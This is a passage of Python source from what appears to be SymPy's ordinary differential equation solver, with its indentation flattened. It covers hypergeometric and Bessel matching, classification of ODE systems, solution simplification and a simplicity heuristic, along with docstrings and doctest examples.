I0 = ((a-b+1)*(a-b-1)*x**2 + 2*((1-a-b)*c + 2*a*b)*x + c*(c-2))/(4*x**2*(x-1)**2)
if sing_point != [0, 1]:
# If the singular points are [0, 1] then we already have the standard equation.
eqs = []
sing_eqs = [-beta/alpha, -delta/gamma, (delta-beta)/(alpha-gamma)]
# set up equations for finding the Mobius transformation
for i in range(3):
if i<len(sing_point):
eqs.append(Eq(sing_eqs[i], sing_point[i]))
else:
eqs.append(Eq(1/sing_eqs[i], 0))
# solve the above equations for the Mobius transformation
_beta = -alpha*sing_point[0]
_delta = -gamma*sing_point[1]
_gamma = alpha
if len(sing_point) == 3:
_gamma = (_beta + sing_point[2]*alpha)/(sing_point[2] - sing_point[1])
mob = (alpha*x + beta)/(gamma*x + delta)
mob = mob.subs(beta, _beta)
mob = mob.subs(delta, _delta)
mob = mob.subs(gamma, _gamma)
mob = cancel(mob)
t = (beta - delta*x)/(gamma*x - alpha)
t = cancel(((t.subs(beta, _beta)).subs(delta, _delta)).subs(gamma, _gamma))
else:
mob = x
t = x
# apply the Mobius transformation to I to bring it to the form of I0.
I = I.subs(x, t)
I = I*(t.diff(x))**2
I = factor(I)
dict_I = {x**2:0, x:0, 1:0}
I0_num, I0_dem = I0.as_numer_denom()
# collecting the coefficients of (x**2, x) of the standard equation,
# substituting (a-b) = s, (a+b) = r
dict_I0 = {x**2:s**2 - 1, x:(2*(1-r)*c + (r+s)*(r-s)), 1:c*(c-2)}
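# These entries follow from I0 above with s = a - b and r = a + b, since
# (a-b+1)*(a-b-1) = s**2 - 1 and 2*((1-a-b)*c + 2*a*b) = 2*(1-r)*c + (r+s)*(r-s).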
# collecting the coefficients of (x**2, x) from I0 of the given equation.
dict_I.update(collect(expand(cancel(I*I0_dem)), [x**2, x], evaluate=False))
eqs = []
# Compare the coefficients of the powers of x to find the values of the
# parameters of the standard equation.
for key in [x**2, x, 1]:
eqs.append(Eq(dict_I[key], dict_I0[key]))
# The equation can have many possible roots. The root is selected so that,
# for the standard equation eq = x*(x-1)*f(x).diff(x, 2) + ((a+b+1)*x-c)*f(x).diff(x) + a*b*f(x),
# the recovered parameters are a, b and c.
_c = 1 - factor(sqrt(1+eqs[2].lhs))
if not _c.has(Symbol):
_c = min(list(roots(eqs[2], c)))
_s = factor(sqrt(eqs[0].lhs + 1))
_r = _c - factor(sqrt(_c**2 + _s**2 + eqs[1].lhs - 2*_c))
_a = (_r + _s)/2
_b = (_r - _s)/2
rn = {'a':simplify(_a), 'b':simplify(_b), 'c':simplify(_c), 'k':k, 'mobius':mob, 'type':"2F1"}
return rn
def match_2nd_hypergeometric(r, func):
x = func.args[0]
a3 = Wild('a3', exclude=[func, func.diff(x), func.diff(x, 2)])
b3 = Wild('b3', exclude=[func, func.diff(x), func.diff(x, 2)])
c3 = Wild('c3', exclude=[func, func.diff(x), func.diff(x, 2)])
A = cancel(r[b3]/r[a3])
B = cancel(r[c3]/r[a3])
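# The ODE is normalised to f'' + A*f' + B*f = 0 before looking for an
# equivalence with the hypergeometric equation.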
d = equivalence_hypergeometric(A, B, func)
rn = None
if d:
if d['type'] == "2F1":
rn = match_2nd_2F1_hypergeometric(d['I0'], d['k'], d['sing_point'], func)
if rn is not None:
rn.update({'A':A, 'B':B})
# This could be extended to the 1F1 and 0F1 types as well.
return rn
def match_2nd_linear_bessel(r, func):
from sympy.polys.polytools import factor
# eq = a3*f(x).diff(x, 2) + b3*f(x).diff(x) + c3*f(x)
f = func
x = func.args[0]
df = f.diff(x)
a = Wild('a', exclude=[f,df])
b = Wild('b', exclude=[x, f,df])
a4 = Wild('a4', exclude=[x,f,df])
b4 = Wild('b4', exclude=[x,f,df])
c4 = Wild('c4', exclude=[x,f,df])
d4 = Wild('d4', exclude=[x,f,df])
a3 = Wild('a3', exclude=[f, df, f.diff(x, 2)])
b3 = Wild('b3', exclude=[f, df, f.diff(x, 2)])
c3 = Wild('c3', exclude=[f, df, f.diff(x, 2)])
# leading coeff of f(x).diff(x, 2)
coeff = factor(r[a3]).match(a4*(x-b)**b4)
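# Illustrative example: a leading coefficient of x**2 matches with
# a4 = 1, b = 0, b4 = 2, so the singular point below is x = 0.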
if coeff:
# coeff[b4] == 0 means the leading coefficient is constant
if coeff[b4] == 0:
return None
point = coeff[b]
else:
return None
if point:
r[a3] = simplify(r[a3].subs(x, x+point))
r[b3] = simplify(r[b3].subs(x, x+point))
r[c3] = simplify(r[c3].subs(x, x+point))
# normalise a3 to the form x**2
r[a3] = cancel(r[a3]/(coeff[a4]*(x)**(-2+coeff[b4])))
r[b3] = cancel(r[b3]/(coeff[a4]*(x)**(-2+coeff[b4])))
r[c3] = cancel(r[c3]/(coeff[a4]*(x)**(-2+coeff[b4])))
# checking if b3 is of form c*(x-b)
coeff1 = factor(r[b3]).match(a4*(x))
if coeff1 is None:
return None
# c3 may have a very complicated form, so first check for the (a - b) form;
# if it matches, a and b are then compared with the standard Bessel form.
# a, b are the Wild variables defined above.
_coeff2 = r[c3].match(a - b)
if _coeff2 is None:
return None
# matching c3 with the standard form
coeff2 = factor(_coeff2[a]).match(c4**2*(x)**(2*a4))
if coeff2 is None:
return None
if _coeff2[b] == 0:
coeff2[d4] = 0
else:
coeff2[d4] = factor(_coeff2[b]).match(d4**2)[d4]
rn = {'n':coeff2[d4], 'a4':coeff2[c4], 'd4':coeff2[a4]}
rn['c4'] = coeff1[a4]
rn['b4'] = point
return rn
def classify_sysode(eq, funcs=None, **kwargs):
r"""
Returns a dictionary of parameter names and values that define the system
of ordinary differential equations in ``eq``.
The parameters are further used in
:py:meth:`~sympy.solvers.ode.dsolve` for solving that system.
Some parameter names and values are:
'is_linear' (boolean), which tells whether the given system is linear.
Note that "linear" here refers to the operator: terms such as ``x*diff(x,t)`` are
nonlinear, whereas terms like ``sin(t)*diff(x,t)`` are still linear operators.
'func' (list) contains the :py:class:`~sympy.core.function.Function`s that
appear with a derivative in the ODE, i.e. those that we are trying to solve
the ODE for.
'order' (dict) with the maximum derivative for each element of the 'func'
parameter.
'func_coeff' (dict or Matrix) with the coefficient for each triple ``(equation number,
function, order)``. The coefficients are those subexpressions that do not
appear in 'func', and hence can be considered constant for purposes of ODE
solving. The value of this parameter can also be a Matrix if the system of ODEs are
linear first order of the form X' = AX where X is the vector of dependent variables.
Here, this function returns the coefficient matrix A.
'eq' (list) with the equations from ``eq``, sympified and transformed into
expressions (we are solving for these expressions to be zero).
'no_of_equations' (int) is the number of equations (same as ``len(eq)``).
'type_of_equation' (string) is an internal classification of the type of
ODE.
'is_constant' (boolean), which tells if the system of ODEs is constant coefficient
or not. This key is a temporary addition and is present in the match dict only when
the system of ODEs is linear, first order, constant coefficient and homogeneous; its
value is True whenever the key is present, otherwise the key does not exist.
'is_homogeneous' (boolean), which tells if the system of ODEs is homogeneous. Like the
key 'is_constant', this key is a temporary addition and it is True whenever present,
since it is only added when the system is linear first order constant coefficient
homogeneous.
References
==========
- http://eqworld.ipmnet.ru/en/solutions/sysode/sode-toc1.htm
- A. D. Polyanin and A. V. Manzhirov, Handbook of Mathematics for Engineers and Scientists
Examples
========
>>> from sympy import Function, Eq, symbols, diff
>>> from sympy.solvers.ode.ode import classify_sysode
>>> from sympy.abc import t
>>> f, x, y = symbols('f, x, y', cls=Function)
>>> k, l, m, n = symbols('k, l, m, n', Integer=True)
>>> x1 = diff(x(t), t) ; y1 = diff(y(t), t)
>>> x2 = diff(x(t), t, t) ; y2 = diff(y(t), t, t)
>>> eq = (Eq(x1, 12*x(t) - 6*y(t)), Eq(y1, 11*x(t) + 3*y(t)))
>>> classify_sysode(eq)
{'eq': [-12*x(t) + 6*y(t) + Derivative(x(t), t), -11*x(t) - 3*y(t) + Derivative(y(t), t)], 'func': [x(t), y(t)],
'func_coeff': {(0, x(t), 0): -12, (0, x(t), 1): 1, (0, y(t), 0): 6, (0, y(t), 1): 0, (1, x(t), 0): -11, (1, x(t), 1): 0, (1, y(t), 0): -3, (1, y(t), 1): 1}, 'is_linear': True, 'no_of_equation': 2, 'order': {x(t): 1, y(t): 1}, 'type_of_equation': None}
>>> eq = (Eq(diff(x(t),t), 5*t*x(t) + t**2*y(t) + 2), Eq(diff(y(t),t), -t**2*x(t) + 5*t*y(t)))
>>> classify_sysode(eq)
{'eq': [-t**2*y(t) - 5*t*x(t) + Derivative(x(t), t) - 2, t**2*x(t) - 5*t*y(t) + Derivative(y(t), t)],
'func': [x(t), y(t)], 'func_coeff': {(0, x(t), 0): -5*t, (0, x(t), 1): 1, (0, y(t), 0): -t**2, (0, y(t), 1): 0,
(1, x(t), 0): t**2, (1, x(t), 1): 0, (1, y(t), 0): -5*t, (1, y(t), 1): 1}, 'is_linear': True, 'no_of_equation': 2,
'order': {x(t): 1, y(t): 1}, 'type_of_equation': None}
"""
# Sympify equations and convert iterables of equations into
# a list of equations
def _sympify(eq):
return list(map(sympify, eq if iterable(eq) else [eq]))
eq, funcs = (_sympify(w) for w in [eq, funcs])
for i, fi in enumerate(eq):
if isinstance(fi, Equality):
eq[i] = fi.lhs - fi.rhs
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
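# t is the independent variable, taken from a derivative appearing in the
# first equation.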
matching_hints = {"no_of_equation":i+1}
matching_hints['eq'] = eq
if i==0:
raise ValueError("classify_sysode() works for systems of ODEs. "
"For scalar ODEs, classify_ode should be used")
# find all the functions if not given
order = dict()
if funcs==[None]:
funcs = _extract_funcs(eq)
funcs = list(set(funcs))
if len(funcs) != len(eq):
raise ValueError("Number of functions given is not equal to the number of equations %s" % funcs)
# This list-of-lists logic for funcs is to be replaced later.
func_dict = dict()
for func in funcs:
if not order.get(func, False):
max_order = 0
for i, eqs_ in enumerate(eq):
order_ = ode_order(eqs_,func)
if max_order < order_:
max_order = order_
eq_no = i
if eq_no in func_dict:
func_dict[eq_no] = [func_dict[eq_no], func]
else:
func_dict[eq_no] = func
order[func] = max_order
funcs = [func_dict[i] for i in range(len(func_dict))]
matching_hints['func'] = funcs
for func in funcs:
if isinstance(func, list):
for func_elem in func:
if len(func_elem.args) != 1:
raise ValueError("dsolve() and classify_sysode() work with "
"functions of one variable only, not %s" % func)
else:
if func and len(func.args) != 1:
raise ValueError("dsolve() and classify_sysode() work with "
"functions of one variable only, not %s" % func)
# find the order of each equation in the system of ODEs
matching_hints["order"] = order
# find coefficients of terms f(t), diff(f(t),t) and higher derivatives
# and similarly for other functions g(t), diff(g(t),t) in all equations.
# Here j denotes the equation number, funcs[l] denotes the function under
# consideration, and k denotes the order of the derivative of funcs[l]
# whose coefficient we are calculating.
def linearity_check(eqs, j, func, is_linear_):
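# func_coef[j, func, k] is the coefficient of diff(func, t, k) in equation j.
# The system is marked nonlinear if such a coefficient depends on any of the
# unknown functions, or if func appears in the equation other than through a
# linear term.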
for k in range(order[func] + 1):
func_coef[j, func, k] = collect(eqs.expand(), [diff(func, t, k)]).coeff(diff(func, t, k))
if is_linear_ == True:
if func_coef[j, func, k] == 0:
if k == 0:
coef = eqs.as_independent(func, as_Add=True)[1]
for xr in range(1, ode_order(eqs,func) + 1):
coef -= eqs.as_independent(diff(func, t, xr), as_Add=True)[1]
if coef != 0:
is_linear_ = False
else:
if eqs.as_independent(diff(func, t, k), as_Add=True)[1]:
is_linear_ = False
else:
for func_ in funcs:
if isinstance(func_, list):
for elem_func_ in func_:
dep = func_coef[j, func, k].as_independent(elem_func_, as_Add=True)[1]
if dep != 0:
is_linear_ = False
else:
dep = func_coef[j, func, k].as_independent(func_, as_Add=True)[1]
if dep != 0:
is_linear_ = False
return is_linear_
func_coef = {}
is_linear = True
for j, eqs in enumerate(eq):
for func in funcs:
if isinstance(func, list):
for func_elem in func:
is_linear = linearity_check(eqs, j, func_elem, is_linear)
else:
is_linear = linearity_check(eqs, j, func, is_linear)
matching_hints['func_coeff'] = func_coef
matching_hints['is_linear'] = is_linear
if len(set(order.values())) == 1:
order_eq = list(matching_hints['order'].values())[0]
if matching_hints['is_linear'] == True:
if matching_hints['no_of_equation'] == 2:
if order_eq == 1:
type_of_equation = check_linear_2eq_order1(eq, funcs, func_coef)
else:
type_of_equation = None
# If the equation doesn't match up with any of the
# general case solvers in systems.py and the number
# of equations is greater than 2, then NotImplementedError
# should be raised.
else:
type_of_equation = None
else:
if matching_hints['no_of_equation'] == 2:
if order_eq == 1:
type_of_equation = check_nonlinear_2eq_order1(eq, funcs, func_coef)
else:
type_of_equation = None
elif matching_hints['no_of_equation'] == 3:
if order_eq == 1:
type_of_equation = check_nonlinear_3eq_order1(eq, funcs, func_coef)
else:
type_of_equation = None
else:
type_of_equation = None
else:
type_of_equation = None
matching_hints['type_of_equation'] = type_of_equation
return matching_hints
def check_linear_2eq_order1(eq, func, func_coef):
x = func[0].func
y = func[1].func
fc = func_coef
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
r = dict()
# for equations Eq(a1*diff(x(t),t), b1*x(t) + c1*y(t) + d1)
# and Eq(a2*diff(y(t),t), b2*x(t) + c2*y(t) + d2)
r['a1'] = fc[0,x(t),1] ; r['a2'] = fc[1,y(t),1]
r['b1'] = -fc[0,x(t),0]/fc[0,x(t),1] ; r['b2'] = -fc[1,x(t),0]/fc[1,y(t),1]
r['c1'] = -fc[0,y(t),0]/fc[0,x(t),1] ; r['c2'] = -fc[1,y(t),0]/fc[1,y(t),1]
forcing = [S.Zero,S.Zero]
for i in range(2):
for j in Add.make_args(eq[i]):
if not j.has(x(t), y(t)):
forcing[i] += j
if not (forcing[0].has(t) or forcing[1].has(t)):
# We can handle homogeneous case and simple constant forcings
r['d1'] = forcing[0]
r['d2'] = forcing[1]
else:
# Issue #9244: nonhomogeneous linear systems are not supported
return None
# Conditions to check for type 6 whose equations are Eq(diff(x(t),t), f(t)*x(t) + g(t)*y(t)) and
# Eq(diff(y(t),t), a*[f(t) + a*h(t)]x(t) + a*[g(t) - h(t)]*y(t))
p = 0
q = 0
p1 = cancel(r['b2']/(cancel(r['b2']/r['c2']).as_numer_denom()[0]))
p2 = cancel(r['b1']/(cancel(r['b1']/r['c1']).as_numer_denom()[0]))
for n, i in enumerate([p1, p2]):
for j in Mul.make_args(collect_const(i)):
if not j.has(t):
q = j
if q and n==0:
if ((r['b2']/j - r['b1'])/(r['c1'] - r['c2']/j)) == j:
p = 1
elif q and n==1:
if ((r['b1']/j - r['b2'])/(r['c2'] - r['c1']/j)) == j:
p = 2
# End of condition for type 6
if r['d1']!=0 or r['d2']!=0:
return None
else:
if all(not r[k].has(t) for k in 'a1 a2 b1 b2 c1 c2'.split()):
return None
else:
r['b1'] = r['b1']/r['a1'] ; r['b2'] = r['b2']/r['a2']
r['c1'] = r['c1']/r['a1'] ; r['c2'] = r['c2']/r['a2']
if p:
return "type6"
else:
# Equations for type 7 are Eq(diff(x(t),t), f(t)*x(t) + g(t)*y(t)) and Eq(diff(y(t),t), h(t)*x(t) + p(t)*y(t))
return "type7"
def check_nonlinear_2eq_order1(eq, func, func_coef):
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
f = Wild('f')
g = Wild('g')
u, v = symbols('u, v', cls=Dummy)
def check_type(x, y):
r1 = eq[0].match(t*diff(x(t),t) - x(t) + f)
r2 = eq[1].match(t*diff(y(t),t) - y(t) + g)
if not (r1 and r2):
r1 = eq[0].match(diff(x(t),t) - x(t)/t + f/t)
r2 = eq[1].match(diff(y(t),t) - y(t)/t + g/t)
if not (r1 and r2):
r1 = (-eq[0]).match(t*diff(x(t),t) - x(t) + f)
r2 = (-eq[1]).match(t*diff(y(t),t) - y(t) + g)
if not (r1 and r2):
r1 = (-eq[0]).match(diff(x(t),t) - x(t)/t + f/t)
r2 = (-eq[1]).match(diff(y(t),t) - y(t)/t + g/t)
if r1 and r2 and not (r1[f].subs(diff(x(t),t),u).subs(diff(y(t),t),v).has(t) \
or r2[g].subs(diff(x(t),t),u).subs(diff(y(t),t),v).has(t)):
return 'type5'
else:
return None
for func_ in func:
if isinstance(func_, list):
x = func[0][0].func
y = func[0][1].func
eq_type = check_type(x, y)
if not eq_type:
eq_type = check_type(y, x)
return eq_type
x = func[0].func
y = func[1].func
fc = func_coef
n = Wild('n', exclude=[x(t),y(t)])
f1 = Wild('f1', exclude=[v,t])
f2 = Wild('f2', exclude=[v,t])
g1 = Wild('g1', exclude=[u,t])
g2 = Wild('g2', exclude=[u,t])
for i in range(2):
eqs = 0
for terms in Add.make_args(eq[i]):
eqs += terms/fc[i,func[i],1]
eq[i] = eqs
r = eq[0].match(diff(x(t),t) - x(t)**n*f)
if r:
g = (diff(y(t),t) - eq[1])/r[f]
if r and not (g.has(x(t)) or g.subs(y(t),v).has(t) or r[f].subs(x(t),u).subs(y(t),v).has(t)):
return 'type1'
r = eq[0].match(diff(x(t),t) - exp(n*x(t))*f)
if r:
g = (diff(y(t),t) - eq[1])/r[f]
if r and not (g.has(x(t)) or g.subs(y(t),v).has(t) or r[f].subs(x(t),u).subs(y(t),v).has(t)):
return 'type2'
g = Wild('g')
r1 = eq[0].match(diff(x(t),t) - f)
r2 = eq[1].match(diff(y(t),t) - g)
if r1 and r2 and not (r1[f].subs(x(t),u).subs(y(t),v).has(t) or \
r2[g].subs(x(t),u).subs(y(t),v).has(t)):
return 'type3'
r1 = eq[0].match(diff(x(t),t) - f)
r2 = eq[1].match(diff(y(t),t) - g)
num, den = (
(r1[f].subs(x(t),u).subs(y(t),v))/
(r2[g].subs(x(t),u).subs(y(t),v))).as_numer_denom()
R1 = num.match(f1*g1)
R2 = den.match(f2*g2)
# phi = (r1[f].subs(x(t),u).subs(y(t),v))/num
if R1 and R2:
return 'type4'
return None
def check_nonlinear_2eq_order2(eq, func, func_coef):
return None
def check_nonlinear_3eq_order1(eq, func, func_coef):
x = func[0].func
y = func[1].func
z = func[2].func
fc = func_coef
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
u, v, w = symbols('u, v, w', cls=Dummy)
a = Wild('a', exclude=[x(t), y(t), z(t), t])
b = Wild('b', exclude=[x(t), y(t), z(t), t])
c = Wild('c', exclude=[x(t), y(t), z(t), t])
f = Wild('f')
F1 = Wild('F1')
F2 = Wild('F2')
F3 = Wild('F3')
for i in range(3):
eqs = 0
for terms in Add.make_args(eq[i]):
eqs += terms/fc[i,func[i],1]
eq[i] = eqs
r1 = eq[0].match(diff(x(t),t) - a*y(t)*z(t))
r2 = eq[1].match(diff(y(t),t) - b*z(t)*x(t))
r3 = eq[2].match(diff(z(t),t) - c*x(t)*y(t))
if r1 and r2 and r3:
num1, den1 = r1[a].as_numer_denom()
num2, den2 = r2[b].as_numer_denom()
num3, den3 = r3[c].as_numer_denom()
if solve([num1*u-den1*(v-w), num2*v-den2*(w-u), num3*w-den3*(u-v)],[u, v]):
return 'type1'
r = eq[0].match(diff(x(t),t) - y(t)*z(t)*f)
if r:
r1 = collect_const(r[f]).match(a*f)
r2 = ((diff(y(t),t) - eq[1])/r1[f]).match(b*z(t)*x(t))
r3 = ((diff(z(t),t) - eq[2])/r1[f]).match(c*x(t)*y(t))
if r1 and r2 and r3:
num1, den1 = r1[a].as_numer_denom()
num2, den2 = r2[b].as_numer_denom()
num3, den3 = r3[c].as_numer_denom()
if solve([num1*u-den1*(v-w), num2*v-den2*(w-u), num3*w-den3*(u-v)],[u, v]):
return 'type2'
r = eq[0].match(diff(x(t),t) - (F2-F3))
if r:
r1 = collect_const(r[F2]).match(c*F2)
r1.update(collect_const(r[F3]).match(b*F3))
if r1:
if eq[1].has(r1[F2]) and not eq[1].has(r1[F3]):
r1[F2], r1[F3] = r1[F3], r1[F2]
r1[c], r1[b] = -r1[b], -r1[c]
r2 = eq[1].match(diff(y(t),t) - a*r1[F3] + r1[c]*F1)
if r2:
r3 = (eq[2] == diff(z(t),t) - r1[b]*r2[F1] + r2[a]*r1[F2])
if r1 and r2 and r3:
return 'type3'
r = eq[0].match(diff(x(t),t) - z(t)*F2 + y(t)*F3)
if r:
r1 = collect_const(r[F2]).match(c*F2)
r1.update(collect_const(r[F3]).match(b*F3))
if r1:
if eq[1].has(r1[F2]) and not eq[1].has(r1[F3]):
r1[F2], r1[F3] = r1[F3], r1[F2]
r1[c], r1[b] = -r1[b], -r1[c]
r2 = (diff(y(t),t) - eq[1]).match(a*x(t)*r1[F3] - r1[c]*z(t)*F1)
if r2:
r3 = (diff(z(t),t) - eq[2] == r1[b]*y(t)*r2[F1] - r2[a]*x(t)*r1[F2])
if r1 and r2 and r3:
return 'type4'
r = (diff(x(t),t) - eq[0]).match(x(t)*(F2 - F3))
if r:
r1 = collect_const(r[F2]).match(c*F2)
r1.update(collect_const(r[F3]).match(b*F3))
if r1:
if eq[1].has(r1[F2]) and not eq[1].has(r1[F3]):
r1[F2], r1[F3] = r1[F3], r1[F2]
r1[c], r1[b] = -r1[b], -r1[c]
r2 = (diff(y(t),t) - eq[1]).match(y(t)*(a*r1[F3] - r1[c]*F1))
if r2:
r3 = (diff(z(t),t) - eq[2] == z(t)*(r1[b]*r2[F1] - r2[a]*r1[F2]))
if r1 and r2 and r3:
return 'type5'
return None
def check_nonlinear_3eq_order2(eq, func, func_coef):
return None
@vectorize(0)
def odesimp(ode, eq, func, hint):
r"""
Simplifies solutions of ODEs, including trying to solve for ``func`` and
running :py:meth:`~sympy.solvers.ode.constantsimp`.
It may use knowledge of the type of solution that the hint returns to
apply additional simplifications.
It also attempts to integrate any :py:class:`~sympy.integrals.integrals.Integral`\s
in the expression, if the hint is not an ``_Integral`` hint.
This function should have no effect on expressions returned by
:py:meth:`~sympy.solvers.ode.dsolve`, as
:py:meth:`~sympy.solvers.ode.dsolve` already calls
:py:meth:`~sympy.solvers.ode.ode.odesimp`, but the individual hint functions
do not call :py:meth:`~sympy.solvers.ode.ode.odesimp` (because the
:py:meth:`~sympy.solvers.ode.dsolve` wrapper does). Therefore, this
function is designed for mainly internal use.
Examples
========
>>> from sympy import sin, symbols, dsolve, pprint, Function
>>> from sympy.solvers.ode.ode import odesimp
>>> x, u2, C1 = symbols('x,u2,C1')
>>> f = Function('f')
>>> eq = dsolve(x*f(x).diff(x) - f(x) - x*sin(f(x)/x), f(x),
... hint='1st_homogeneous_coeff_subs_indep_div_dep_Integral',
... simplify=False)
>>> pprint(eq, wrap_line=False)
x
----
f(x)
/
|
| / 1 \
| -|u2 + -------|
| | /1 \|
| | sin|--||
| \ \u2//
log(f(x)) = log(C1) + | ---------------- d(u2)
| 2
| u2
|
/
>>> pprint(odesimp(eq, f(x), 1, {C1},
... hint='1st_homogeneous_coeff_subs_indep_div_dep'
... )) #doctest: +SKIP
x
--------- = C1
/f(x)\
tan|----|
\2*x /
"""
x = func.args[0]
f = func.func
C1 = get_numbered_constants(eq, num=1)
constants = eq.free_symbols - ode.free_symbols
# First, integrate if the hint allows it.
eq = _handle_Integral(eq, func, hint)
if hint.startswith("nth_linear_euler_eq_nonhomogeneous"):
eq = simplify(eq)
if not isinstance(eq, Equality):
raise TypeError("eq should be an instance of Equality")
# Second, clean up the arbitrary constants.
# Right now, nth linear hints can put as many as 2*order constants in an
# expression. If that number grows with another hint, the logic here should
# be updated accordingly, or constantsimp() rewritten to handle an
# arbitrary number of constants.
eq = constantsimp(eq, constants)
# Lastly, now that we have cleaned up the expression, try solving for func.
# When CRootOf is implemented in solve(), we will want to return a CRootOf
# every time instead of an Equality.
# Get the f(x) on the left if possible.
if eq.rhs == func and not eq.lhs.has(func):
eq = [Eq(eq.rhs, eq.lhs)]
# make sure we are working with lists of solutions in simplified form.
if eq.lhs == func and not eq.rhs.has(func):
# The solution is already solved
eq = [eq]
# special simplification of the rhs
if hint.startswith("nth_linear_constant_coeff"):
# Collect terms to make the solution look nice.
# This is also necessary for constantsimp to remove unnecessary
# terms from the particular solution from variation of parameters
#
# Collect is not behaving reliably here. The results for
# some linear constant-coefficient equations with repeated
# roots do not properly simplify all constants sometimes.
# 'collectterms' gives different orders sometimes, and results
# differ in collect based on that order. The
# sort-reverse trick fixes things, but may fail in the
# future. In addition, collect is splitting exponentials with
# rational powers for no reason. We have to do a match
# to fix this using Wilds.
#
# XXX: This global collectterms hack should be removed.
global collectterms
collectterms.sort(key=default_sort_key)
collectterms.reverse()
assert len(eq) == 1 and eq[0].lhs == f(x)
sol = eq[0].rhs
sol = expand_mul(sol)
for i, reroot, imroot in collectterms:
sol = collect(sol, x**i*exp(reroot*x)*sin(abs(imroot)*x))
sol = collect(sol, x**i*exp(reroot*x)*cos(imroot*x))
for i, reroot, imroot in collectterms:
sol = collect(sol, x**i*exp(reroot*x))
del collectterms
# Collect is splitting exponentials with rational powers for
# no reason. We call powsimp to fix.
sol = powsimp(sol)
eq[0] = Eq(f(x), sol)
else:
# The solution is not solved, so try to solve it
try:
floats = any(i.is_Float for i in eq.atoms(Number))
eqsol = solve(eq, func, force=True, rational=False if floats else None)
if not eqsol:
raise NotImplementedError
except (NotImplementedError, PolynomialError):
eq = [eq]
else:
def _expand(expr):
numer, denom = expr.as_numer_denom()
if denom.is_Add:
return expr
else:
return powsimp(expr.expand(), combine='exp', deep=True)
# XXX: the rest of odesimp() expects each ``t`` to be in a
# specific normal form: rational expression with numerator
# expanded, but with combined exponential functions (at
# least in this setup all tests pass).
eq = [Eq(f(x), _expand(t)) for t in eqsol]
# special simplification of the lhs.
if hint.startswith("1st_homogeneous_coeff"):
for j, eqi in enumerate(eq):
newi = logcombine(eqi, force=True)
if isinstance(newi.lhs, log) and newi.rhs == 0:
newi = Eq(newi.lhs.args[0]/C1, C1)
eq[j] = newi
# We cleaned up the constants before solving to help the solve engine with
# a simpler expression, but the solved expression could have introduced
# things like -C1, so rerun constantsimp() one last time before returning.
for i, eqi in enumerate(eq):
eq[i] = constantsimp(eqi, constants)
eq[i] = constant_renumber(eq[i], ode.free_symbols)
# If there is only 1 solution, return it;
# otherwise return the list of solutions.
if len(eq) == 1:
eq = eq[0]
return eq
def ode_sol_simplicity(sol, func, trysolving=True):
r"""
Returns an extended integer representing how simple a solution to an ODE
is.
The following things are considered, in order from most simple to least:
- ``sol`` is solved for ``func``.
- ``sol`` is not solved for ``func``, but can be if passed to solve (e.g.,
a solution returned by ``dsolve(ode, func, simplify=False``).
- If ``sol`` is not solved for ``func``, then base the result on the
length of ``sol``, as computed by ``len(str(sol))``.
- If ``sol`` has any unevaluated :py:class:`~sympy.integrals.integrals.Integral`\s,
this will automatically be considered less simple than any of the above.
This function returns an integer such that if solution A is simpler than
solution B by above metric, then ``ode_sol_simplicity(sola, func) <
ode_sol_simplicity(solb, func)``.
Currently, the following are the numbers returned, but if the heuristic is
ever improved, this may change. Only the ordering is guaranteed.
+----------------------------------------------+-------------------+
| Simplicity                                   | Return            |
+==============================================+===================+
| ``sol`` solved for ``func``                  | ``-2``            |
+----------------------------------------------+-------------------+
| ``sol`` not solved for ``func`` but can be   | ``-1``            |
+----------------------------------------------+-------------------+
| ``sol`` is not solved nor solvable for       | ``len(str(sol))`` |
| ``func``                                     |                   |
+----------------------------------------------+-------------------+
| ``sol`` contains an                          | ``oo``            |
| :obj:`~sympy.integrals.integrals.Integral`   |                   |
+----------------------------------------------+-------------------+
``oo`` here means the SymPy infinity, which should compare greater than
any integer.
If you already know :py:meth:`~sympy.solvers.solvers.solve` cannot solve
``sol``, you can use ``trysolving=False`` to skip that step, which is the
only potentially slow step. For example,
:py:meth:`~sympy.solvers.ode.dsolve` with the ``simplify=False`` flag
should do this.
If ``sol`` is a list of solutions, if the worst solution in the list
returns ``oo`` it returns that, otherwise it returns ``len(str(sol))``,
that is, the length of the string representation of the whole list.
Examples
========
This function is designed to be passed to ``min`` as the key argument,
such as ``min(listofsolutions, key=lambda i: ode_sol_simplicity(i,
f(x)))``.
>>> from sympy import symbols, Function, Eq, tan, Integral
>>> from sympy.solvers.ode.ode import ode_sol_simplicity
>>> x, C1, C2 = symbols('x, C1, C2')
>>> f = Function('f')
>>> ode_sol_simplicity(Eq(f(x), C1*x**2), f(x))
-2
>>> ode_sol_simplicity(Eq(x**2 + f(x), C1), f(x))
-1
>>> ode_sol_simplicity(Eq(f(x), C1*Integral(2*x, x)), f(x))
oo
>>> eq1 = Eq(f(x)/tan(f(x)/(2*x)), C1)
>>> eq2 = Eq(f(x)/tan(f(x)/(2*x) + f(x)), C2)
>>> [ode_sol_simplicity(eq, f(x)) for eq in [eq1, eq2]]
[28, 35]
>>> min([eq1, eq2], key=lambda i: ode_sol_simplicity(i, f(x)))
Eq(f(x)/tan(f(x)/(2*x)), C1)
"""
# TODO: if two solutions are solved for f(x), we still want to be
# able to get the simpler of the two
# See the docstring for the coercion rules. We check easier (faster)
# things here first, to save time.
if iterable(sol):
# See if there are Integrals
for i in sol:
if ode_sol_simplicity(i, func, trysolving=trysolving) == oo:
return oo
return len(str(sol))
if sol.has(Integral):
return oo
# Next, try to solve for func. This code will change slightly when CRootOf
# is implemented in solve(). Probably a CRootOf solution should fall
# somewhere between a normal solution and an unsolvable expression.
# First, see if they are already solved
if sol.lhs == func and not sol.rhs.has(func) or \
sol.rhs == func and not sol.lhs.has(func):
return -2
# We are not so lucky, try solving manually
if trysolving:
try:
sols = solve(sol, func)
if not sols:
raise NotImplementedError
except NotImplementedError:
pass
else:
return -1
# Finally, a naive computation based on the length of the string version
# of the expression. This may favor combined fractions because they
# will not have duplicate denominators, and may slightly favor expressions
# with fewer additions and subtractions, as those are separated by spaces
# by the printer.
# Additional ideas for simplicity heuristics are welcome, like maybe
# checking if an equation has a larger domain, or if constantsimp has
# introduced arbitrary constants numbered higher than the order of a
# given ODE that sol is a solution of.
return len(str(sol))
def _extract_funcs(eqs):
from sympy.core.basic import preorder_traversal
funcs = []
for eq in eqs:
derivs = [node for node in preorder_traversal(eq) if isinstance(node, Derivative)]
func = []
for d in derivs:
